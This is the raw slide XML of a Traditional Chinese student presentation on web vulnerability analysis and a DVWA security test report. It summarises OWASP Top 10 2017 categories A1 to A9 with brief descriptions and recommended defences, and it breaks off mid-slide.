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80" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="271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91" r:id="rId25"/>
    <p:sldId id="277" r:id="rId26"/>
    <p:sldId id="278" r:id="rId27"/>
    <p:sldId id="279" r:id="rId28"/>
    <p:sldId id="282" r:id="rId29"/>
    <p:sldId id="292" r:id="rId30"/>
    <p:sldId id="283" r:id="rId31"/>
    <p:sldId id="286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28" r:id="rId46"/>
    <p:sldId id="309" r:id="rId47"/>
    <p:sldId id="308" r:id="rId48"/>
    <p:sldId id="311" r:id="rId49"/>
    <p:sldId id="312" r:id="rId50"/>
    <p:sldId id="313" r:id="rId51"/>
    <p:sldId id="317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郁涵 黃" initials="郁涵" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="91fa86598cb663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7" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="59" d="100"/>
          <a:sy n="59" d="100"/>
        </p:scale>
        <p:origin x="78" y="1080"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-235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C55F9-6932-4AB9-884D-E13E76EB342B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9AB07-5F55-44E3-87AC-60710742D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25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2021/6/27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>
                <a:latin typeface="Book Antiqua"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>網站漏洞分析與實務</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW">
              <a:latin typeface="Book Antiqu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sz="4400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DVWA網站安全測試報告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" b="1">
                <a:ea typeface="新細明體"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>4090E036</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="44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350C9-59E3-40B9-8DD5-B723F965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b="1" dirty="0"/>
              <a:t>OWASP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top 10 2017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DDB3E-8292-449A-9FBC-2BEE7D2D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5805488"/>
            <a:ext cx="11527972" cy="1052512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https://medium.com/hannah-lin/%E5%B9%BC%E5%B9%BC%E7%8F%AD%E4%B9%9F%E8%83%BD%E6%87%82%E7%9A%84-owasp-top-10-692764c51f61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1AF9CE-D42C-42E9-8C6D-DB999AD80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54" y="1593388"/>
            <a:ext cx="7898692" cy="36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111"/>
            <a:ext cx="10515600" cy="1282475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="54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A1 Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="54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注入攻擊</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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36" y="1420586"/>
            <a:ext cx="11674928" cy="5029201"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>主要是沒有妥善檢查及排除符號等，造成的弱點</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0"/>
              <a:t>將攻擊字串注入正常的語法中，使網站出現非預期的結果，並執行輸入指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來改變原本語意，達到竊取資料或破壞資料行為</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議防範措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1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使用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Prepared Statements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Stored Procedures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嚴密檢查所有輸入值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控管錯誤訊息僅管理者可以閱讀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使用過濾字串函數過濾非法的字元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控管資料庫及網站使用者帳號權限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D5A5AC-AED2-42D3-B6B5-A2706831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80" y="4468310"/>
            <a:ext cx="493463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1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35" y="218168"/>
            <a:ext cx="10684329" cy="1316718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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A2 Broken Authentication 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無效身分認證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4" y="1534886"/>
            <a:ext cx="11527972" cy="5104946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>通常發生是脆弱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>帳戶認證</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或是採取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>不安全管理機制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>登入未加密、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Session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無控管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Cookie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為保護</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans TC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC"/>
              </a:rPr>
              <a:t>登入時的身分認證有缺陷，導致被竊取相關登入資訊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans TC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC"/>
              </a:rPr>
              <a:t>建議</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>防範</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC"/>
              </a:rPr>
              <a:t>措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC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使用完善的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Cookie Session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保護機制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不允許外部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Session</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans T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登入及修改資訊頁面使用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SSL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加密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設定完善的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Timeout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機制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多因素認證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驗證密碼強度及密碼定期更換機制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6C5ABF-E232-4237-AF55-0129D46E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58" y="3667620"/>
            <a:ext cx="395342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1" y="322941"/>
            <a:ext cx="11157857" cy="826861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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A3 Sensitive Data Exposure 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敏感資料外洩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071" y="1453243"/>
            <a:ext cx="11157857" cy="5137151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>保護不足，使入侵系統輕易竊取達到詐欺冒用等犯罪行為</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>敏感資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不能公開的資料，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>醫療資訊、信用卡資訊、個人訊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攻擊手法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>監聽、攔截、竄改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議防範措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>採用通道加密與傳輸層加密</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資料加密後儲存</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>採用合法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>核發之憑證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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>http</a:t>
            </a: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使用國際機構驗證且未遭破解的演算法，不使用自行創造加密方式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5C89D-CD48-4F05-9940-764C0EEB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163" y="4021818"/>
            <a:ext cx="466790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9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35" y="287791"/>
            <a:ext cx="1091292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A4 XML External Entity, XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="40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外部處理器漏洞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64" y="1453243"/>
            <a:ext cx="11413672" cy="3461657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將攻擊字串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，並上傳網站伺服器，網站伺服器解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>時觸發攻擊行為</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件共享、監聽內部網路 、執行遠端城市 ，導致資料外洩或是被接管</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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建議防範措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="+mn-ea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修補或升級有引用的套件，並將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+mn-ea"/>
              </a:rPr>
              <a:t>XML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升級到最新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驗證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+mn-ea"/>
              </a:rPr>
              <a:t>XML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或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+mn-ea"/>
              </a:rPr>
              <a:t>XSL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文件是否經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+mn-ea"/>
              </a:rPr>
              <a:t>SCD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驗證會類似方法傳入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+mn-ea"/>
              </a:rPr>
              <a:t>禁止外部實體引用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909A3C-4579-4056-B587-4DD3AE4C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610493"/>
            <a:ext cx="5363323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8" y="18255"/>
            <a:ext cx="11397343" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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A5 Broken Access Control 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無效的存取控管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28" y="1343818"/>
            <a:ext cx="11397342" cy="4991668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="charter"/>
              </a:rPr>
              <a:t>利用漏洞去存取沒有經過授權的功能或察看敏感資料、修改使用者數據、更改訪問權限等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>竄改傳送內容，將其送到網頁伺服器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議控制措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1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避免將物件直接暴露給使用者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驗證所有物件是否為正確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預設禁止任何存取行為，並先判斷使用者是否有權限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans T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12529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC"/>
              </a:rPr>
              <a:t>採用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC"/>
              </a:rPr>
              <a:t>RBAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC"/>
              </a:rPr>
              <a:t>集中控管授權機制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans T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請求參數必須在伺服器進行驗證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580636-0A10-49D7-9CEA-B43EA268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609" y="2669381"/>
            <a:ext cx="238158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85" y="210456"/>
            <a:ext cx="11789229" cy="941161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A6 Security Misconfiguration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="40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不安全的組態設定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85" y="1151618"/>
            <a:ext cx="11636829" cy="391024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系統管理或配置不當造成的安全性漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與安全功能機制相關的系統組態或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>應用程式參數被錯誤的設定或是強度不足</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>組態問題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設帳號密碼、開放不必要功能、對安全配置不清楚</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議控制措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>針對不同層面的組態設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>關比不必要功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>修改預設帳密、定期更新元件、注意安全設定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607ACB-C234-4759-80C4-3569FC0B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29" y="5009015"/>
            <a:ext cx="449642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" y="142421"/>
            <a:ext cx="10978243" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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A7 XSS (Cross-Site Scripting) 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跨站攻擊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420586"/>
            <a:ext cx="12192000" cy="5437413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>允許惡意使用者將程式碼注入網頁上，其他使用者在觀看網頁時就會載入並惡意執行到惡意程式碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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風險</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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/>
              <a:t>盜用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、網站轉址、修改網站內容、執行客製化腳本以提高權限等動作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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主要是利用在輸入欄位輸入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JS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的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script tag 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來造成攻擊 又可以分為三種常見類型：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 Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="charter"/>
              </a:rPr>
              <a:t>PersistentDOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 、 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charter"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議控制措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1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將使用者所提供的內容進行過濾， 限制可使用的字元</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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讓使用者提供的資料不會被瀏 覽器認為是指令碼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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同時使用白名單與黑名單機制過濾資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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63AC01-16E1-449E-90DA-E372AAE8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986" y="5169947"/>
            <a:ext cx="4142013" cy="14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108416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A8 Insecure Deserialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="36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不安全的反序列化漏洞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6672"/>
            <a:ext cx="12192000" cy="5713072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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當攻擊者提供竄改後的惡意物件進行反序列化，可能導致應用程式或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API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出現不安全的風險</a:t>
            </a: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例如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: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注入攻擊（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Injection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）、跨站腳本攻擊（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XSS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）、遠端程式碼執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans TC"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>(Serialization):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是一種用來轉換程式語言物件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Object)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>格式的動作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>(Deserialization) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將儲存的資料格式轉回程式語言物件的動作 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議控制措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a: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不接受來自不信任來源的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Noto Sans TC"/>
              </a:rPr>
              <a:t>序列化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物件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans TC"/>
            </a:endParaRP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只允許原始資料型態進行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Noto Sans TC"/>
              </a:rPr>
              <a:t>反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>時限制可以處理的物件名稱 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>透過白名單防禦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將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Noto Sans TC"/>
              </a:rPr>
              <a:t>序列化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的物件加上數位簽章或進行加密，防止新增惡意物件或資料竄改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans TC"/>
            </a:endParaRP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記錄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Noto Sans TC"/>
              </a:rPr>
              <a:t>反序列化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所發生的例外情況與失敗訊息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Noto Sans TC"/>
            </a:endParaRPr>
          </a:p>
          <a:p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監控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Noto Sans TC"/>
              </a:rPr>
              <a:t>反序列化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，當用戶持續進行反序列化時，應啟動警告機制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Noto Sans TC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7D3377-5373-421C-84D7-8329975F8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815" y="3347357"/>
            <a:ext cx="3885207" cy="14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1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097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A9 Using Components with Known Vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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使用已有漏洞的元件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0971"/>
            <a:ext cx="12192000" cy="5617028"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>透過掃描工具偵測到系統使用具有弱點之元 件，並利用該弱點進行攻擊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議控制措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>識別整理專案中所有使用到的元件、底層軟體及其版本資訊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
